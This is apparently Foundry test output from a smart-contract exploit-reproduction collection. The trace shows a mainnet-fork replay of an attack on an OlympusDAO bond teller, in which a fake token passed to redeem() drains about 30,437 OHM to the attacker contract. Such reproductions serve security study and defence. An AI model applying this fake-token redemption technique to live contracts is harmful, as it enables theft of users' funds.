Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.23s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 785.08ms (4.54ms CPU time)

Ran 1 test for src/test/2022-10/OlympusDao_exp.sol:AttackContract
[PASS] testExploit() (gas: 192733)
Logs:
  ---------- Start from block 15794363 ----------
  Attacker OHM balance: 0.000000000
  Redeeming...
  Attacker OHM balance after hack: 30437.077948152

Traces:
  [5098] AttackContract::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 15794363 [1.579e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(OHM: [0x64aa3364F17a4D01c6f1751Fd97C2BD3D7e7f1D5], "OHM")
    │   └─ ← [Return]
    ├─ [0] VM::label(BondFixedExpiryTeller: [0x007FE7c498A2Cf30971ad8f2cbC36bd14Ac51156], "BondFixedExpiryTeller")
    │   └─ ← [Return]
    └─ ← [Stop]

  [200333] AttackContract::testExploit()
    ├─ [0] console::log("---------- Start from block %s ----------", 15794363 [1.579e7]) [staticcall]
    │   └─ ← [Stop]
    ├─ [2468] OHM::balanceOf(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ emit log_named_decimal_uint(key: "Attacker OHM balance", val: 0, decimals: 9)
    ├─ [110557] → new FakeToken@0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f
    │   └─ ← [Return] 552 bytes of code
    ├─ [2468] OHM::balanceOf(BondFixedExpiryTeller: [0x007FE7c498A2Cf30971ad8f2cbC36bd14Ac51156]) [staticcall]
    │   └─ ← [Return] 30437077948152 [3.043e13]
    ├─ [34457] BondFixedExpiryTeller::redeem(FakeToken: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 30437077948152 [3.043e13])
    │   ├─ [360] FakeToken::expiry() [staticcall]
    │   │   └─ ← [Return] 1
    │   ├─ [619] FakeToken::burn(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 30437077948152 [3.043e13])
    │   │   └─ ← [Stop]
    │   ├─ [358] FakeToken::underlying() [staticcall]
    │   │   └─ ← [Return] OHM: [0x64aa3364F17a4D01c6f1751Fd97C2BD3D7e7f1D5]
    │   ├─ [25996] OHM::transfer(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 30437077948152 [3.043e13])
    │   │   ├─ emit Transfer(from: BondFixedExpiryTeller: [0x007FE7c498A2Cf30971ad8f2cbC36bd14Ac51156], to: AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 30437077948152 [3.043e13])
    │   │   ├─  storage changes:
    │   │   │   @ 0x879b72460980896918cfde80d2534d0d5f7eb1646abfadba79622901cb141118: 0x00000000000000000000000000000000000000000000000000001baeaf3816f8 → 0
    │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x00000000000000000000000000000000000000000000000000001baeaf3816f8
    │   │   └─ ← [Return] true
    │   └─ ← [Stop]
    ├─ [0] console::log("Redeeming...") [staticcall]
    │   └─ ← [Stop]
    ├─ [468] OHM::balanceOf(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 30437077948152 [3.043e13]
    ├─ emit log_named_decimal_uint(key: "Attacker OHM balance after hack", val: 30437077948152 [3.043e13], decimals: 9)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 6.13s (3.04s CPU time)

Ran 2 test suites in 7.13s (6.91s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
